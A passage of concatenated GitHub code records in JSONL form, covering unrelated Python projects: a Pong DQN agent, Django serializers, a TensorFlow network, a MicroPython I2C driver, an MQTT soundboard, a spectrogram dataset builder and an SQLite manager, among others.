PongEnv.ACTION_TO_FUN_MAPPING[action]()\n\n def reset(self):\n reset()\n state = self.get_state()\n return PongEnv.state_to_input_repr(state)\n\n def render(self, mode='human'):\n render(self.get_state())\n\n def step(self, action):\n # print(\"step(): {}\".format(action))\n self.perform_action(action)\n # print(\"TAKING ACTION: \", action)\n update()\n state = self.get_state()\n reward = state['player_score'] - state['enemy_score']\n done = abs(state['player_score'] - state['enemy_score']) >= PongEnv.K\n return PongEnv.state_to_input_repr(state), reward, done, {}\n\n def clone_state(self):\n return copy.deepcopy(state)\n\n def restore_state(self, state_):\n global state\n state = copy.deepcopy(state_)\n\n def clone_full_state(self):\n return copy.deepcopy(state)\n\n def restore_full_state(self, state_):\n global state\n state = copy.deepcopy(state_)\n\n# Model\ndef setup_model(env):\n model = Sequential()\n state_param_amount = 8\n actions_amount = env.action_space.n\n print(env.action_space.n)\n model.add(Flatten(input_shape=(1, state_param_amount)))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(actions_amount, activation='linear'))\n return model\n\n# Agent\ndef setup_agent(env, model):\n actions_amount = env.action_space.n\n policy = BoltzmannQPolicy()\n memory = SequentialMemory(limit=50000, window_length=1)\n dqn = DQNAgent(model=model, memory=memory, policy=policy,\n nb_actions=actions_amount, nb_steps_warmup=10, target_model_update=1e-2)\n dqn.compile(Adam(lr=1e-3), metrics=['mae'])\n return dqn\n\ndef train():\n env = PongEnv()\n model = setup_model(env)\n dqn = setup_agent(env, model)\n dqn.fit(env, nb_steps=50000, visualize=False, verbose=1)\n dqn.save_weights(MODEL_FILE, overwrite=True)\n\ndef run_model():\n env = PongEnv()\n model = setup_model(env)\n dqn = setup_agent(env, model)\n dqn.load_weights(MODEL_FILE)\n dqn.test(env, nb_episodes=50, visualize=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', action='store_true', default=False)\n parser.add_argument('--play', action='store_true', default=False)\n args = parser.parse_args()\n if args.train:\n print(\"Training\")\n train()\n elif args.play:\n run_game()\n else:\n print(\"Running saved model\")\n run_model()\n","repo_name":"comonadd/pong-rl","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":9823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20913012746","text":"# named slice\n\nrecord = '....................100 .......513.25 ..........'\ncost1 = int(record[20:23]) * float(record[31:37])\n\nSHARES = slice(20, 23)\nPRICE = slice(31, 37)\ncost2 = int(record[SHARES]) * float(record[PRICE])\n\na = slice(5, 50, 2)\nprint(a.start, a.stop, a.step)\n\n# slice.indices\ns = 'HelloWorld'\nprint(a.indices(len(s))) # change the end (5, 10, 2)\nfor i in range(*a.indices(len(s))):\n print(i, s[i])\n","repo_name":"ljy95135/PythonCookBook3","sub_path":"data_structure/ds1_11_slice_for_hard_code.py","file_name":"ds1_11_slice_for_hard_code.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11805213263","text":"\"\"\"Обработка запросов и ответов к базе произведения.\"\"\"\n\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\n\nimport datetime as dt\n\nfrom .models import GenreTitle, Titles, Genres, Categories, Author\n\n\nclass AuthorSerializer(serializers.ModelSerializer):\n \"\"\"Для отображения по информации автор (для расширения).\"\"\"\n\n titles = serializers.SlugRelatedField(\n slug_field='title',\n many=True,\n allow_null=True,\n read_only=True\n )\n\n class Meta:\n model = Author\n fields = ('slug', 'titles',)\n\n\nclass GenresSerializer(serializers.ModelSerializer):\n \"\"\"Жанры, описание.\"\"\"\n\n class Meta:\n model = Genres\n fields = ('genre',)\n\n\nclass CategoriesSerializer(serializers.ModelSerializer):\n \"\"\"Категории, описание.\"\"\"\n\n class Meta:\n model = Categories\n fields = '__all__'\n\n\nclass TitlesSerializer(serializers.ModelSerializer):\n \"\"\"Основной метод получения информации.\"\"\"\n\n category = serializers.SlugRelatedField(\n slug_field='slug',\n many=False,\n queryset=Categories.objects.all()\n )\n genres = GenresSerializer(many=True, required=False)\n author = serializers.SlugRelatedField(\n slug_field='slug',\n many=False,\n queryset=Author.objects.all()\n )\n year = serializers.SerializerMethodField()\n\n class Meta:\n fields = ('pk', 'title', 'author', 'year', 'category', 'genres')\n model = Titles\n validators = [\n UniqueTogetherValidator(\n queryset=Titles.objects.all(),\n fields=('title', 'author', 'category')\n )\n ]\n\n def validate_year(self, value):\n year = dt.date.today().year\n if value > year:\n raise serializers.ValidationError('ПРоверьте год')\n return value\n\n def create(self, validated_data):\n \"\"\"Определяем наличие жанров и прописываем.\"\"\"\n if 'genres' not in self.initial_data:\n title = Titles.objects.create(**validated_data)\n return title\n genres = validated_data.pop('genres')\n title = Titles.objects.create(**validated_data)\n for genre in genres:\n current_genre, status = Genres.objects.get_or_create(**genre)\n GenreTitle.objects.create(genre=current_genre, title=title)\n\n return title\n","repo_name":"Vinsya87/bookish-potato","sub_path":"api_yamdb/composition/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9800310614","text":"import tensorflow as tf\n\nclass DQNetwork:\n def __init__(self, action_size, learning_rate, name='DQNetwork'):\n self.state_size = [1, 4, 4]\n self.action_size = action_size\n self.learning_rate = float(learning_rate)\n\n with tf.variable_scope(name):\n # We create the placeholders\n # *state_size means that we take each elements of state_size in tuple hence is like if we wrote\n # [None, 84, 84, 4]\n self.inputs_ = tf.placeholder(tf.float32, [None, 1, 4, 4], name=\"inputs\")\n self.actions_ = tf.placeholder(tf.float32, [None, action_size], name=\"actions_\")\n\n # Remember that target_Q is the R(s,a) + ymax Qhat(s', a')\n self.target_Q = tf.placeholder(tf.float32, [None], name=\"target\")\n\n\n self.flatten = tf.layers.flatten(self.inputs_)\n ## --> [1152]\n\n self.fc1 = tf.layers.dense(inputs=self.flatten,\n units=32,\n activation=tf.nn.elu,\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\n name=\"fc1\")\n\n self.fc2 = tf.layers.dense(inputs=self.flatten,\n units=64,\n activation=tf.nn.elu,\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\n name=\"fc2\")\n\n self.output = tf.layers.dense(inputs=self.fc2,\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\n units=action_size,\n activation=None)\n\n # Q is our predicted Q value.\n self.Q = tf.reduce_sum(tf.multiply(self.output, self.actions_), axis=1)\n\n # The loss is the difference between our predicted Q_values and the Q_target\n # Sum(Qtarget - Q)^2\n self.loss = tf.reduce_mean(tf.square(self.target_Q - self.Q))\n\n self.optimizer = tf.train.RMSPropOptimizer(self.learning_rate).minimize(self.loss)\n","repo_name":"cyberphantom/Selfie-Drone-Stick","sub_path":"script/lib/dqnet.py","file_name":"dqnet.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"13991454267","text":"#!/usr/bin/env python\n\nimport os\nimport math\nimport sys\nimport logging\n\nfrom Generator_Utils import *\nfrom OCO_MathUtil import *\nfrom OCO_TextUtils import index_range_list, evaluate_bool_str\nfrom OCO_Matrix import OCO_Matrix\n\nimport numpy\nimport random\n\n# For consistency if random values are used in 'modify' statement\nrandom.seed(sys.argv[0])\n\nimport copy as copy_module\n\ndef Process_File(source, destination, fileKeywords, moduleSections, valuesDict, mapDict):\n logger = logging.getLogger(os.path.basename(__file__))\n\n # Load existing file\n matrix_obj = OCO_Matrix(source)\n\n for modifySect in moduleSections:\n\n # Add ability to specify cols individually or using a * to goto end\n columns = Apply_Template(modifySect.Get_Keyword_Value('columns'), valuesDict, mapDict=mapDict)\n rows = Apply_Template(modifySect.Get_Keyword_Value('rows'), valuesDict, mapDict=mapDict)\n modify = modifySect.Get_Keyword_Value('modify')\n delete = evaluate_bool_str( modifySect.Get_Keyword_Value('delete') )\n add_column = evaluate_bool_str( modifySect.Get_Keyword_Value('add_column') )\n\n if columns != None:\n try:\n columns = index_range_list(columns, max_value=matrix_obj.dims[1])\n except:\n if not type(columns) is ListType:\n col_name_list = [columns]\n else:\n col_name_list = columns\n\n columns = []\n for curr_name in col_name_list:\n if curr_name.lower() not in matrix_obj.labels_lower:\n if add_column:\n matrix_obj.add_column(curr_name)\n columns.append( matrix_obj.dims[1] - 1 )\n else:\n raise IOError('Column named %s not found in file: %s' % (curr_name, source))\n \n columns.append( matrix_obj.labels_lower.index(curr_name.lower()) )\n else:\n columns = range(matrix_obj.dims[1])\n\n if rows != None:\n rows = index_range_list(rows, max_value=matrix_obj.dims[0])\n else:\n rows = range(matrix_obj.dims[0])\n\n if delete and modify != None:\n raise ValueError('delete and modify keywords can not be specified together')\n\n if delete:\n if len(columns) > matrix_obj.dims[1]:\n raise IOError('More columns to be deleted %d than exist %d in input file %s' % (len(columns), matrix_obj.dims[1], source))\n \n new_data = numpy.zeros((matrix_obj.dims[0], matrix_obj.dims[1]-len(columns)), dtype=numpy.double)\n new_labels = []\n new_units = []\n\n new_col_idx = 0\n for old_col_idx in range(matrix_obj.dims[1]):\n if old_col_idx not in columns:\n new_labels.append(matrix_obj.labels[old_col_idx])\n new_units.append(matrix_obj.units[old_col_idx])\n\n new_data[:,new_col_idx] = matrix_obj.data[:,old_col_idx]\n\n new_col_idx += 1\n\n matrix_obj.data = new_data\n matrix_obj.labels = new_labels\n matrix_obj.units = new_units\n\n if modify != None and len(modify) > 0:\n \n modifyDict = copy_module.copy(valuesDict)\n\n Get_Constant_Values(modifySect.Get_Section('->CONSTANTS'), modifyDict)\n\n for row_idx in rows:\n for col_idx in columns:\n modifyDict['original'] = str(matrix_obj.data[row_idx][col_idx])\n\n modify_str = Apply_Template(modify, modifyDict, mapDict=mapDict)\n\n try:\n matrix_obj.data[row_idx][col_idx] = eval(modify_str)\n except:\n raise RuntimeError('Error evaluating modify string: \"%s\"' % modify_str)\n\n matrix_obj.write(destination, auto_size_cols=False)\n \n","repo_name":"nasa/RtRetrievalFramework","sub_path":"deprecated/generator/modules/modify_data.py","file_name":"modify_data.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"21"} +{"seq_id":"71336380214","text":"'''\r\nMQTT Computer\r\nAuthor: Sawyer Travis (sjt29)\r\nPlays music files based on MQTT messages\r\n'''\r\nimport paho.mqtt.client as mqtt\r\nfrom playsound import playsound\r\n\r\n# Constants\r\nPORT = 1883\r\nQOS = 0\r\n\r\n# Set hostname for MQTT broker\r\nBROKER = 'mqtt.eclipseprojects.io'\r\n\r\n# Callback when connecting to the MQTT broker\r\ndef on_connect(client, userdata, flags, rc):\r\n print(\"Connected with result code \" + str(rc))\r\n client.subscribe(\"hacks/keypad\", qos=QOS)\r\n\r\n# Callback when client receives a PUBLISH message from the broker\r\ndef on_message(client, data, msg):\r\n if msg.topic == 'hacks/keypad':\r\n message = msg.payload\r\n print(f'Received message: Key = {message}')\r\n sound = \"\"\r\n if message == b'0' :\r\n sound = \"audio/pls-dont-click-By-Tuna.mp3\"\r\n elif message == b'1' :\r\n sound = \"audio/emotional-damage-meme.mp3\"\r\n elif message == b'2' :\r\n sound = \"audio/k.o.-sound-effect-By-Tuna.mp3\"\r\n elif message == b'3' :\r\n sound = \"audio/anime-wow-sound-effect.mp3\"\r\n elif message == b'4' :\r\n sound = \"audio/metal-pipe-falling-By-Tuna.mp3\"\r\n elif message == b'5' :\r\n sound = \"audio/fortnite-default-dance-bass-boosted.mp3\"\r\n elif message == b'6' :\r\n sound = \"audio/kowalski-analysis.mp3\"\r\n elif message == b'7' :\r\n sound = \"audio/bruh.mp3\"\r\n elif message == b'8' :\r\n sound = \"audio/tim_and_eric_it_s_free_real_estate.mp3\"\r\n elif message == b'9' :\r\n sound = \"audio/vine-boom.mp3\"\r\n elif message == b'a' :\r\n sound = \"audio/maro-jump-sound-effect_1.mp3\"\r\n elif message == b'b' :\r\n sound = \"audio/lego-breaking.mp3\"\r\n elif message == b'c' :\r\n sound = \"audio/loud-noti.mp3\"\r\n elif message == b'd' :\r\n sound = \"audio/nfl.mp3\"\r\n elif message == b'e' :\r\n sound = \"audio/obi-wan-hello-there.mp3\"\r\n elif message == b'f' :\r\n sound = \"audio/generalkenobi.mp3\"\r\n\r\n # play sound if it exists\r\n if sound != \"\" :\r\n print(\"Playing sound: \" + sound)\r\n playsound(sound, 0)\r\n print(\"Sound finished\")\r\n\r\n# Setup MQTT client and callbacks\r\nclient = mqtt.Client()\r\nclient.on_connect = on_connect\r\nclient.on_message = on_message\r\n\r\n# Connect to MQTT broker and subscribe to the button topic\r\nclient.connect(BROKER, PORT, 60)\r\nclient.loop_forever()","repo_name":"bdkopen/CalvinHacks-2023","sub_path":"mqtt-computer.py","file_name":"mqtt-computer.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21137902036","text":"from machine import I2C as _I2C\nfrom machine import Pin\nfrom board import i2cPorts\n\n\nclass I2C:\n \"\"\"Custom I2C Class for RP2040\"\"\"\n\n # This init seems to work for micropythn (untested)\n def __init__(self, scl, sda, *, frequency=100000):\n\n for portId, portScl, portSda in i2cPorts:\n try:\n if scl == portScl and sda == portSda:\n # Set-up I2C device using normal micropython syntax:\n self._i2c = _I2C(portId, sda=sda, scl=scl, freq=frequency)\n break\n except RuntimeError:\n pass\n else:\n raise ValueError(\n \"No Hardware I2C on (scl,sda)={}\\nValid I2C ports: {}\".format(\n (scl, sda), i2cPorts\n )\n )\n \n # Haven't dove into these methods yet - JW\n def scan(self):\n \"\"\"Perform an I2C Device Scan\"\"\"\n return self._i2c.scan()\n\n def writeto(self, address, buffer, *, stop=True):\n \"Write data to the address from the buffer\"\n return self._i2c.writeto(address, buffer, stop)\n\n def readfrom_into(self, address, buffer, *, stop=True):\n \"\"\"Read data from an address and into the buffer\"\"\"\n return self._i2c.readfrom_into(address, buffer, stop)\n\n def writeto_then_readfrom(\n self,\n address,\n buffer_out,\n buffer_in,\n *,\n out_start=0,\n out_end=None,\n in_start=0,\n in_end=None,\n stop=False,\n ):\n \"\"\"Write data from buffer_out to an address and then\n read data from an address and into buffer_in\n \"\"\"\n if out_end:\n self.writeto(address, buffer_out[out_start:out_end], stop=stop)\n else:\n self.writeto(address, buffer_out[out_start:], stop=stop)\n\n if not in_end:\n in_end = len(buffer_in)\n read_buffer = memoryview(buffer_in)[in_start:in_end]\n self.readfrom_into(address, read_buffer, stop=stop)\n\n\n","repo_name":"JonWakefield/Circuit-Python-to-Micro-Python-drivers","sub_path":"Drivers/i2c.py","file_name":"i2c.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16564681453","text":"#!/usr/bin/env python3\n\n# Imports.\nimport numpy as np\nimport pathlib\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport ipywidgets as widgets\nfrom ipywidgets import interact, interact_manual, fixed\nimport seaborn as sns\nimport sys\nimport yaml\nfrom time import process_time\nimport argparse\nfrom pathlib import Path\nimport shutil\nimport scipy.special as ss\n\n# Additional settings.\npd.set_option(\"display.max_rows\", 500)\npd.set_option(\"display.max_columns\", 500)\n\nfrom he6_cres_deep_learning.daq import DAQ, Config\n\n\ndef main():\n \"\"\"\n A script for running an experiment based on a dictionary input (in\n the form of a json file). See\n `/he6-cres-spec-sims/config_files/rocks_exp_config_example.json` for\n an example of what it needs to contain.\n\n Args:\n local_dir (str): where to put experiment results. Ideally on a\n harddrive.\n sim_exp_name (str): name of the experiment (identical to name of\n .json that defines experiment).\n \"\"\"\n\n # Parse command line arguments.\n par = argparse.ArgumentParser()\n arg = par.add_argument\n arg(\n \"-c\",\n \"--config_path\",\n type=str,\n help=\"Path to the base daq config file to copy.\",\n )\n arg(\n \"-gn\",\n \"--gain_noise_path\",\n type=str,\n help=\"Path to the gain_noise file to copy for setting the gain and noise mean of the data file.\",\n )\n arg(\n \"-n_files\",\n \"--n_files\",\n type=int,\n help=\"number of files to build in dataset. \",\n )\n arg(\n \"-n_events\",\n \"--n_events_per_file\",\n type=int,\n help=\"average number of events per file.\",\n )\n arg(\n \"-len\",\n \"--spec_length\",\n type=float,\n help=\"length of spec file in seconds.\",\n )\n arg(\n \"-seed\",\n \"--random_seed\",\n type=int,\n default=123456,\n help=\"random seed used to generate the spec files.\",\n )\n\n arg(\n \"-sanity_check\",\n \"--sanity_check\",\n type=bool,\n default=False,\n help=\"if true plots of the first file created will be presented.\",\n )\n\n args = par.parse_args()\n\n build_sideband_training_ds(\n args.config_path,\n args.gain_noise_path,\n args.n_files,\n args.n_events_per_file,\n args.spec_length,\n args.random_seed,\n args.sanity_check,\n )\n\n return None\n\n\ndef build_sideband_training_ds(\n config_path, gain_noise_path, n_files, n_events_per_file, spec_length, random_seed, sanity_check\n):\n\n print(f\"\\n\\n\\n Building snr oscillation dataset.\\n\\n\\n\")\n\n # ---- Copy base config ----\n name = \"sideband_ds\"\n config_path = Path(config_path)\n config_path_sideband = config_path.with_name(\n name + config_path.suffix\n )\n shutil.copyfile(str(config_path), str(config_path_sideband))\n\n # ---- Copy then alter base noise_gain file to make it simpler. ----\n\n # Step 0: make a copy of the gain noise file.\n gain_noise_path = Path(gain_noise_path)\n gain_noise_path_sideband = gain_noise_path.with_name(\n gain_noise_path.stem + f\"_{name}\" + gain_noise_path.suffix\n )\n shutil.copyfile(str(gain_noise_path), str(gain_noise_path_sideband))\n\n # Step 1: alter the gain_noise file.\n congifure_gain_noise_csv(gain_noise_path_sideband)\n\n # ---- Build spec files ----\n config = Config(config_path_sideband)\n\n # Change default settings of config to match input args.\n config.daq.gain_noise_csv_path = gain_noise_path_sideband\n config.daq.spec_length = spec_length\n config.daq.random_seed = random_seed\n\n\n # Extract necessary parameters from config.\n spec_length = config.daq.spec_length\n freq_bw = config.daq.freq_bw\n\n # Build the track set to be simulated.\n tracks = build_sideband_track_set(\n n_files, n_events_per_file, spec_length, freq_bw, random_seed\n )\n\n # Build the simulated spec files.\n daq = DAQ(config)\n daq.run(tracks)\n\n if sanity_check:\n \n # ---- Visuzlize first spec file ----\n file_in_acq = 0\n spec_path = daq.spec_file_paths[file_in_acq]\n spec_array = daq.spec_to_array(spec_path, slices=-1)\n plot_sparse_spec(spec_array, spec_length, freq_bw)\n plot_tracks(tracks, file_in_acq, freq_bw)\n plot_noise_gain(config.daq.gain_noise_csv_path)\n\n print(f\"\\n\\n\\nDone building simple dataset.\")\n\n return None\n\n\ndef build_sideband_track_set(n_files, n_events_per_file, spec_length, freq_bw, seed):\n\n rng = np.random.default_rng(seed)\n\n n_events = n_files * n_events_per_file\n\n file_in_acq = rng.integers(low=0, high=n_files, size=n_events)\n event_num = np.arange(0, n_events, 1)\n time_start = rng.uniform(low=0, high=spec_length, size=n_events)\n time_stop = np.array([spec_length] * n_events)\n\n freq_start = rng.uniform(low=100e6, high=freq_bw, size=n_events)\n slope = rng.normal(loc=1e11, scale=1e10, size=n_events)\n freq_stop = freq_start + slope * (time_stop - time_start)\n\n band_power_start = np.array([80e-15] * n_events)\n band_power_stop = band_power_start\n band_num = np.array([0] * n_events)\n\n h = rng.uniform(low=.9, high=1.1, size=n_events)\n print(f\"h: {h}\")\n axial_freq = rng.uniform(low=60e6, high=100e6, size=n_events)\n\n segments = pd.DataFrame(\n {\n \"file_in_acq\": file_in_acq,\n \"event_num\": event_num,\n \"time_start\": time_start,\n \"time_stop\": time_stop,\n \"freq_start\": freq_start,\n \"freq_stop\": freq_stop,\n \"slope\": slope,\n \"band_power_start\": band_power_start,\n \"band_power_stop\": band_power_stop,\n \"band_num\": band_num,\n \"h\": h,\n \"axial_freq\": axial_freq,\n }\n )\n\n tracks = process_segments(segments)\n\n\n return tracks\n\n\ndef plot_noise_gain(gain_noise_csv_path):\n pd.read_csv(gain_noise_csv_path).set_index(\"freq\").plot.line()\n plt.show()\n return None\n\n\ndef plot_sparse_spec(spec_array, spec_length, freq_bw, snr_cut=5):\n\n cut_condition = np.array(\n (spec_array > spec_array.mean(axis=0) * snr_cut).T, dtype=float\n )\n extent = [0, spec_length, 0, freq_bw]\n\n fig, ax = plt.subplots(figsize=(12, 8))\n\n ax.imshow(\n 1 - cut_condition,\n origin=\"lower\",\n aspect=\"auto\",\n interpolation=None,\n cmap=\"gray\",\n extent=extent,\n )\n\n ax.set_title(\"Sparse Spectrogram\")\n ax.set_xlabel(\"Time (s)\")\n ax.set_ylabel(\"Freq (Hz)\")\n plt.show()\n\n return None\n\n\ndef plot_tracks(tracks, file_in_acq, freq_bw):\n\n condition = tracks.file_in_acq == file_in_acq\n\n fig, ax = plt.subplots(figsize=(12, 8))\n\n for index, row in tracks[condition].iterrows():\n\n time_coor = np.array([row[\"time_start\"], row[\"time_stop\"]])\n freq_coor = np.array([row[\"freq_start\"], row[\"freq_stop\"]])\n if np.abs(row.band_num) == 1:\n ax.plot(\n time_coor,\n freq_coor,\n \"ro-\",\n markersize=0.5,\n alpha=0.5,\n )\n if np.abs(row.band_num) == 0:\n ax.plot(\n time_coor,\n freq_coor,\n \"yo-\",\n markersize=0.5,\n alpha=0.5,\n )\n ax.set_ylim(0, freq_bw)\n ax.set_title(\"tracks\")\n ax.set_xlabel(\"Time (s)\")\n ax.set_ylabel(\"Freq (Hz)\")\n plt.show()\n\n return None\n\n\ndef process_segments(segments):\n\n sideband_num = 1\n # Build the segments into tracks.\n band_list = []\n for segment_index, row in segments.iterrows():\n\n # sideband_calc(avg_cycl_freq, axial_freq, h, num_sidebands=sideband_num)\n sideband_amplitudes = sideband_calc(\n row.freq_start, row.axial_freq, row.h, num_sidebands=sideband_num\n )[0]\n\n for i, band_num in enumerate(range(-sideband_num, sideband_num + 1)):\n\n # copy segment in order to fill in band specific values\n row_copy = row.copy()\n\n # fill in new avg_cycl_freq, band_power, band_num\n row_copy[\"freq_start\"] = sideband_amplitudes[i][0]\n row_copy[\"freq_stop\"] = row_copy[\"freq_start\"] + row_copy[\"slope\"] * (\n row_copy[\"time_stop\"] - row_copy[\"time_start\"]\n )\n # Note that the sideband amplitudes need to be squared to give power.\n row_copy[\"band_power_start\"] = (\n sideband_amplitudes[i][1] ** 2 * row.band_power_start\n )\n row_copy[\"band_power_stop\"] = row_copy[\"band_power_start\"]\n row_copy[\"band_num\"] = band_num\n\n print(row_copy)\n # append to band_list, as it's better to grow a list than a df\n band_list.append(row_copy.tolist())\n\n bands_df = pd.DataFrame(band_list, columns=segments.columns)\n\n return bands_df\n\n\ndef congifure_gain_noise_csv(csv_path):\n\n # Sinusoidal gain:\n col = \"gain\"\n\n array = np.array([1.0] * 4096)\n update_gain_noise_csv(csv_path, col, array)\n\n # Flat noise:\n col = \"noise_mean\"\n\n array = np.array([1.0] * 4096)\n\n update_gain_noise_csv(csv_path, col, array)\n\n\ndef update_gain_noise_csv(csv_path, col, array):\n \"\"\"\n Helper function for editing gain_noise.csv.\n \"\"\"\n noise_gain_df = pd.read_csv(csv_path)\n noise_gain_df[col] = array\n noise_gain_df.to_csv(csv_path, index=False)\n\n return None\n\n\n# ---- Functions for sideband creation ----\n\n\ndef format_sideband_array(\n sidebands_one, avg_cyc_freq, axial_freq, mod_index=np.nan, num_sidebands=1\n):\n \"\"\"Does formatting for array with list of sideband magnitudes (normalized), and their start frequencies.\n Takes in 1-sided list of sideband magnitudes\n \"\"\"\n # Calculate (2-sided) list of (frequency, amplitude) of sidebands\n sidebands = []\n\n for k in range(-num_sidebands, num_sidebands + 1):\n freq = avg_cyc_freq + k * axial_freq\n magnitude = sidebands_one[abs(k)]\n pair = (freq, magnitude)\n sidebands.append(pair)\n\n ### Intentionally returns modulation index of nan as it is only (meaningfully) defined for harmonic traps\n return sidebands, mod_index\n\n\ndef sideband_calc(avg_cycl_freq, axial_freq, h, num_sidebands=1):\n\n \"\"\"Calculates relative magnitudes of num_sidebands sidebands from\n average cyclotron frequency (avg_cycl_freq), axial frequency\n (axial_freq), and maximum axial amplitude (zmax).\n \"\"\"\n\n sidebands = [abs(ss.jv(k, h)) for k in range(num_sidebands + 1)]\n return format_sideband_array(sidebands, avg_cycl_freq, axial_freq, h, num_sidebands)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Helium6CRES/he6-cres-deep-learning","sub_path":"build_sideband_ds.py","file_name":"build_sideband_ds.py","file_ext":"py","file_size_in_byte":10636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14491159429","text":"import bitstring\n\ndef isSubnormal(a):\n\tb = bitstring.pack('>d', a)\n\tsbits = b[0:1]\n\tebits = b[1:12]\n\tmbits = b[12:]\n\tminExp = bitstring.BitArray(bin='00000000000')\n\t\n\tzero = 0 \n\tpack_zero = bitstring.pack('>d', zero)\n\tmbits_zero = pack_zero[12:]\n\n\tif ebits.bin == minExp.bin and mbits.bin != mbits_zero.bin :\n\t\treturn True\n\telse:\n\t\treturn False\n","repo_name":"kcwanglucky/ORIE-5270","sub_path":"HW4/detectSubnormalNumber.py","file_name":"detectSubnormalNumber.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23362868287","text":"\"\"\"\r\nArgumentos por valor o por referencia\r\n\"\"\"\r\ndef doblar_valor(numero):\r\n return numero * 2\r\n\r\nn = 5\r\nn = doblar_valor(n)#Argumentos por valor\r\n\r\nprint(n)\r\n\r\ndef doblar_valores(numeros):\r\n for i,n in enumerate(numeros):\r\n numeros[i] *= 2\r\n\r\nn = [5,10,15,20]\r\ndoblar_valores(n[:])#Por valor (n[:]) | Por (n) referencia \r\n\r\nprint(n)","repo_name":"Matius2002/Programacion-en-Python","sub_path":"funciones/ArgumentosPorValoroPorReferencia.py","file_name":"ArgumentosPorValoroPorReferencia.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10351817107","text":"import subprocess\n\nimport pytest\n\n\n@pytest.fixture\ndef installed_cookiejar(cookiejar_examples):\n path = str(cookiejar_examples.project)\n\n subprocess.call([\"git\", \"init\", path])\n subprocess.call([\"pip\", \"install\", path])\n\n return cookiejar_examples\n\n\ndef test_examples_present(installed_cookiejar):\n cj = installed_cookiejar\n\n import packagename\n\n primes = packagename.do_primes(10)\n\n assert primes == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]\n\n if cj.context['use_compiled_extensions']:\n cprimes = packagename.do_primes(10, usecython=True)\n\n assert primes == cprimes\n\n\n","repo_name":"HERMES-SOC/instrument-package-template","sub_path":"tests/test_package.py","file_name":"test_package.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73382991732","text":"n=int(input(\"enter no.\"))\r\nx=n\r\ns=0\r\nc=len(str(n))\r\nwhile(x>0):\r\n r=x%10\r\n s=s+r**c\r\n x=x//10\r\nif(n==s):\r\n print(\"armstrong\")\r\nelse:\r\n print(\"not\")\r\n","repo_name":"kajalrathore24/PYTHON-LAB","sub_path":"armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9071928468","text":"# install SQLAlchemy\n\nimport sqlalchemy.engine\n\nfrom RMLibs.basic.BasicObject import BasicObject\nimport sqlalchemy as db\n\n\nclass SQLiteManager(BasicObject):\n \"\"\"\n SQLite database manager\n \"\"\"\n\n __PREFIX = \"sqlite:///\"\n\n __file_name: str or None = None\n __connected: bool = False\n __conn: sqlalchemy.engine.Connection or None = None\n __engine: sqlalchemy.engine.Engine or None = None\n\n @property\n def file_name(self) -> str:\n \"\"\"\n :return: the name of the SQLite database file\n \"\"\"\n return self.__file_name\n\n @file_name.setter\n def file_name(self, file_name: str):\n \"\"\"\n sets the name of the SQLite database file\n :param file_name: full path to the db file\n \"\"\"\n self.__file_name = file_name\n\n @property\n def connected(self) -> bool:\n \"\"\"\n :return: True if the connection to the db is open\n \"\"\"\n return self.__connected\n\n @property\n def metadata(self) -> sqlalchemy.MetaData:\n if not self.connected:\n raise Exception(\"The connection is not open\")\n return db.MetaData(self.__engine)\n\n def __del__(self):\n \"\"\"\n Destructor\n \"\"\"\n if self.connected:\n self.close_connection()\n\n def open_connection(self):\n \"\"\"\n Opens the connection to the database file\n \"\"\"\n try:\n if self.connected:\n raise Exception(\"The connection is open yet\")\n self.__engine = db.create_engine(self.__PREFIX + self.file_name)\n self.__conn = self.__engine.connect()\n self.__connected = True\n except Exception as ex:\n self.error('.open_connection(self) - ' + str(ex))\n raise ex\n\n def close_connection(self):\n \"\"\"\n Closes the open connection\n \"\"\"\n try:\n if not self.connected:\n raise Exception(\"The connection is not open\")\n self.__conn.close()\n self.__connected = False\n except Exception as ex:\n self.error('.close_connection(self) - ' + str(ex))\n raise ex\n\n def create_table_if_not_exists(self, table: sqlalchemy.Table):\n try:\n if not self.connected:\n raise Exception(\"The connection is not open\")\n if not self.__engine.dialect.has_table(self.__conn, table.name):\n self.debug_verbose(\".create_table_if_not_exists(self, table: sqlalchemy.Table) - Creating table \" + table.name)\n table.metadata.create_all()\n else:\n self.debug_verbose(\".create_table_if_not_exists(self, table: sqlalchemy.Table) - Table \" + table.name + \" already exists\")\n\n except Exception as ex:\n self.error('.create_table_if_not_exists(self, table: 